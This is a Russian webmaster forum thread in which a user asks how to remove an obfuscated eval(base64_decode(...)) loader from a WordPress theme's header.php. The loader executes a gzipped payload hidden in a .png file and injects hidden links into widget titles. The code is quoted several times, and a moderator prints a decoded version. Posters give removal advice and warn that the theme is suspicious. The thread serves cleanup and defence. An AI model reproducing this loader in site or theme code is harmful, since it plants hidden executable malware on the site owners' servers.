volk23 73 Posted July 2, 2014 Report Share Posted July 2, 2014 <?php global $theme; ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <?php eval(base64_decode(<!--begin-->'JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRtWzNdLiRpMi4kbVs0XS4kaTIuJG1bNV0uJGkzO2FkZF9vcHRpb24oJ3dwX3RoZW1lX21lbnVfZmlyc3QnLGJhc2U2NF9lbmNvZGUoJGNzWzBdKSwnJywnbm8nICk7YWRkX29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnLGJhc2U2NF9lbmNvZGUoJGNzWzFdKSwnJywnbm8nICk7fWZ1bmN0aW9uIGZuKCl7aWYoKGlzX2hvbWUoKSkmJiEoaXNfcGFnZWQoKSkpICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9maXJzdCcpKTtlbHNlICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnKSk7cmV0dXJuICRuO30kX0dFVFsnZ19fJ109MTtmdW5jdGlvbiBjYigkcCl7ZWNobyAoJF9HRVRbJ2dfXyddPjApP2ZuKCk6Jyc7JF9HRVRbJ2dfXyddPTA7cmV0dXJuICRwO31pZiAoJGIpIGFkZF9hY3Rpb24oJ3dpZGdldF90aXRsZScsJ2NiJyk7'));?><!--end--> <html xmlns="http://www.w3.org/1999/xhtml" <?php language_attributes(); ?>> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" /> <title><?php $theme->meta_title(); ?></title> <?php $theme->hook('meta'); ?> <link rel="stylesheet" href="<?php echo THEMATER_URL; ?>/css/reset.css" type="text/css" media="screen, projection" /> <link rel="stylesheet" href="<?php echo THEMATER_URL; ?>/css/defaults.css" type="text/css" media="screen, projection" /> <!--[if lt IE 8]><link rel="stylesheet" href="<?php echo THEMATER_URL; ?>/css/ie.css" type="text/css" media="screen, projection" /><![endif]--> <link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen, projection" /> <?php if ( is_singular() ) { wp_enqueue_script( 'comment-reply' ); } ?> <?php wp_head(); ?> <?php $theme->hook('head'); ?> </head> <body <?php body_class(); ?>> <?php $theme->hook('html_before'); ?> <div id="container"> <?php if($theme->display('menu_primary')) { ?> <div class="clearfix"> <?php $theme->hook('menu_primary'); ?> </div> <?php } ?> <div id="header"> <div class="logo"> <?php if ($theme->get_option('themater_logo_source') == 'image') { ?> <a href="<?php echo home_url(); ?>"><img src="<?php $theme->option('logo'); ?>" alt="<?php bloginfo('name'); ?>" title="<?php bloginfo('name'); ?>" /></a> <?php } else { ?> <?php if($theme->display('site_title')) { ?> <h1 class="site_title"><a href="<?php echo home_url(); ?>"><?php $theme->option('site_title'); ?></a></h1> <?php } ?> <?php if($theme->display('site_description')) { ?> <h2 class="site_description"><?php $theme->option('site_description'); ?></h2> <?php } ?> <?php } ?> </div><!-- .logo --> <div class="header-right"> <div id="topsearch"> <?php get_search_form(); ?> </div> </div><!-- .header-right --> </div><!-- #header --> <?php if($theme->display('menu_secondary')) { ?> <div class="clearfix"> <?php $theme->hook('menu_secondary'); ?> </div> <?php } ?> Есть ли добрый человек который удалит код? Quote Link to post Share on other sites
refer9 136 Posted July 2, 2014 Report Share Posted July 2, 2014 могу взяться убрать ссылку пишите в лс Quote Link to post Share on other sites
WQP 360 Posted July 2, 2014 Report Share Posted July 2, 2014 Удалите код: <?php eval(base64_decode(<!--begin-->'JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRtWzNdLiRpMi4kbVs0XS4kaTIuJG1bNV0uJGkzO2FkZF9vcHRpb24oJ3dwX3RoZW1lX21lbnVfZmlyc3QnLGJhc2U2NF9lbmNvZGUoJGNzWzBdKSwnJywnbm8nICk7YWRkX29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnLGJhc2U2NF9lbmNvZGUoJGNzWzFdKSwnJywnbm8nICk7fWZ1bmN0aW9uIGZuKCl7aWYoKGlzX2hvbWUoKSkmJiEoaXNfcGFnZWQoKSkpICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9maXJzdCcpKTtlbHNlICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnKSk7cmV0dXJuICRuO30kX0dFVFsnZ19fJ109MTtmdW5jdGlvbiBjYigkcCl7ZWNobyAoJF9HRVRbJ2dfXyddPjApP2ZuKCk6Jyc7JF9HRVRbJ2dfXyddPTA7cmV0dXJuICRwO31pZiAoJGIpIGFkZF9hY3Rpb24oJ3dpZGdldF90aXRsZScsJ2NiJyk7'));?> Quote Link to post Share on other sites
volk23 73 Posted July 2, 2014 Author Report Share Posted July 2, 2014 Удалите код: <?php eval(base64_decode(<!--begin-->'JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRtWzNdLiRpMi4kbVs0XS4kaTIuJG1bNV0uJGkzO2FkZF9vcHRpb24oJ3dwX3RoZW1lX21lbnVfZmlyc3QnLGJhc2U2NF9lbmNvZGUoJGNzWzBdKSwnJywnbm8nICk7YWRkX29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnLGJhc2U2NF9lbmNvZGUoJGNzWzFdKSwnJywnbm8nICk7fWZ1bmN0aW9uIGZuKCl7aWYoKGlzX2hvbWUoKSkmJiEoaXNfcGFnZWQoKSkpICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9maXJzdCcpKTtlbHNlICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnKSk7cmV0dXJuICRuO30kX0dFVFsnZ19fJ109MTtmdW5jdGlvbiBjYigkcCl7ZWNobyAoJF9HRVRbJ2dfXyddPjApP2ZuKCk6Jyc7JF9HRVRbJ2dfXyddPTA7cmV0dXJuICRwO31pZiAoJGIpIGFkZF9hY3Rpb24oJ3dpZGdldF90aXRsZScsJ2NiJyk7'));?> сайт падает, я и так это делал Quote Link to post Share on other sites
kumatoz 63 Posted July 2, 2014 Report Share Posted July 2, 2014 Могу помочь. Нужен доступ к сайту по ftp или же тема Quote Link to post Share on other sites
volk23 73 Posted July 2, 2014 Author Report Share Posted July 2, 2014 Могу помочь. Нужен доступ к сайту по ftp или же тема скинул в лс Quote Link to post Share on other sites
Модератор files 2797 Posted July 2, 2014 Модератор Report Share Posted July 2, 2014 сайт падает, я и так это делалвот расшифровка: $f=dirname(__file__).'/images/wp_menu_top.png';$b=get_option('wp_theme_menu_first');if (file_exists($f) and !${$fp = fopen($f,"r");$s = fread($fp,filesize($f));fclose($fp);eval('$m='.gzuncompress(stripslashes($s)).';');$i0=$m[0];$i1=$m[1];$i2=$m[2];$i3=$m[3];unset($m[0],$m[1],$m[2]);shuffle($m);$cs[0]=$i0.$i1.$m[0].$i2.$m[1].$i2.$m[2].$i3;$cs[1]=$i0.$i1.$m[3].$i2.$m[4].$i2.$m[5].$i3;add_option('wp_theme_menu_first',base64_encode($cs[0]),'','no' );add_option('wp_theme_menu_second',base64_encode($cs[1]),'','no' );}function fn(){if((is_home())&&!(is_paged())) $n=base64_decode(get_option('wp_theme_menu_first'));else $n=base64_decode(get_option('wp_theme_menu_second'));return $n;}$_GET['g__']=1;function cb($p){echo ($_GET['g__']>0)?fn():'';$_GET['g__']=0;return $p;}if ($ add_action('widget_title','cb'); в /images/wp_menu_top.png скорее всего тоже вирусный код Quote Link to post Share on other sites
kumatoz 63 Posted July 2, 2014 Report Share Posted July 2, 2014 из header.php удалить вот это <?php eval(base64_decode('JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRtWzNdLiRpMi4kbVs0XS4kaTIuJG1bNV0uJGkzO2FkZF9vcHRpb24oJ3dwX3RoZW1lX21lbnVfZmlyc3QnLGJhc2U2NF9lbmNvZGUoJGNzWzBdKSwnJywnbm8nICk7YWRkX29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnLGJhc2U2NF9lbmNvZGUoJGNzWzFdKSwnJywnbm8nICk7fWZ1bmN0aW9uIGZuKCl7aWYoKGlzX2hvbWUoKSkmJiEoaXNfcGFnZWQoKSkpICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9maXJzdCcpKTtlbHNlICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnKSk7cmV0dXJuICRuO30kX0dFVFsnZ19fJ109MTtmdW5jdGlvbiBjYigkcCl7ZWNobyAoJF9HRVRbJ2dfXyddPjApP2ZuKCk6Jyc7JF9HRVRbJ2dfXyddPTA7cmV0dXJuICRwO31pZiAoJGIpIGFkZF9hY3Rpb24oJ3dpZGdldF90aXRsZScsJ2NiJyk7'));?> удалить файл ../wp-content/themes/GameMagazine/images/wp_menu_top.png. После этого будет работать. Но тема очень подозрительная. Quote Link to post Share on other sites
Модератор files 2797 Posted July 2, 2014 Модератор Report Share Posted July 2, 2014 из header.php удалить вот это <?php eval(base64_decode('JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRtWzNdLiRpMi4kbVs0XS4kaTIuJG1bNV0uJGkzO2FkZF9vcHRpb24oJ3dwX3RoZW1lX21lbnVfZmlyc3QnLGJhc2U2NF9lbmNvZGUoJGNzWzBdKSwnJywnbm8nICk7YWRkX29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnLGJhc2U2NF9lbmNvZGUoJGNzWzFdKSwnJywnbm8nICk7fWZ1bmN0aW9uIGZuKCl7aWYoKGlzX2hvbWUoKSkmJiEoaXNfcGFnZWQoKSkpICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9maXJzdCcpKTtlbHNlICRuPWJhc2U2NF9kZWNvZGUoZ2V0X29wdGlvbignd3BfdGhlbWVfbWVudV9zZWNvbmQnKSk7cmV0dXJuICRuO30kX0dFVFsnZ19fJ109MTtmdW5jdGlvbiBjYigkcCl7ZWNobyAoJF9HRVRbJ2dfXyddPjApP2ZuKCk6Jyc7JF9HRVRbJ2dfXyddPTA7cmV0dXJuICRwO31pZiAoJGIpIGFkZF9hY3Rpb24oJ3dpZGdldF90aXRsZScsJ2NiJyk7'));?> удалить файл ../wp-content/themes/GameMagazine/images/wp_menu_top.png. После этого будет работать. Но тема очень подозрительная. Тема скорее всего не запустится, поскольку не запустятся меню и виджеты. См. расшифрованный код выше. Quote Link to post Share on other sites
kumatoz 63 Posted July 2, 2014 Report Share Posted July 2, 2014 Тема скорее всего не запустится, поскольку не запустятся меню и виджеты. См. расшифрованный код выше. Я не фантазирую, а перед тем, как писать проделал то, о чем писал на своем хосте с этой темой. Quote Link to post Share on other sites
Makedo 291 Posted July 2, 2014 Report Share Posted July 2, 2014 да скачайте тему без кода, вот и все. просто найдите другие дистрибутивы этой темы и все. Quote Link to post Share on other sites
volk23 73 Posted July 2, 2014 Author Report Share Posted July 2, 2014 Я не фантазирую, а перед тем, как писать проделал то, о чем писал на своем хосте с этой темой. спс код убрался, но теперь появились рекламные виджеты Quote Link to post Share on other sites
kumatoz 63 Posted July 2, 2014 Report Share Posted July 2, 2014 да скачайте тему без кода, вот и все. просто найдите другие дистрибутивы этой темы и все. Кстати, да. Вот она http://fthemes.com/gamemagazine-free-wordpress-theme/ Quote Link to post Share on other sites
volk23 73 Posted July 2, 2014 Author Report Share Posted July 2, 2014 Кстати, да. Вот она http://fthemes.com/gamemagazine-free-wordpress-theme/ да я вкурсе))) но стоит ли тратить 900р? Quote Link to post Share on other sites
kumatoz 63 Posted July 2, 2014 Report Share Posted July 2, 2014 спс код убрался, но теперь появились рекламные виджеты Нет ничего такого Quote Link to post Share on other sites
kumatoz 63 Posted July 2, 2014 Report Share Posted July 2, 2014 да я вкурсе))) но стоит ли тратить 900р? Если делать ГС - то может и жалко. А для нормального сайта 900р смешные деньги. К тому же не факт, что тема только этот вредоносный код имеет - скорее там еще сюрпризы ) Quote Link to post Share on other sites
InfoTor 10 Posted July 2, 2014 Report Share Posted July 2, 2014 да я вкурсе))) но стоит ли тратить 900р? Полностью с тобой согласен, не стоит это 900 руб. и на это-том дизайне можно сделать полноценный проект )) Quote Link to post Share on other sites
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.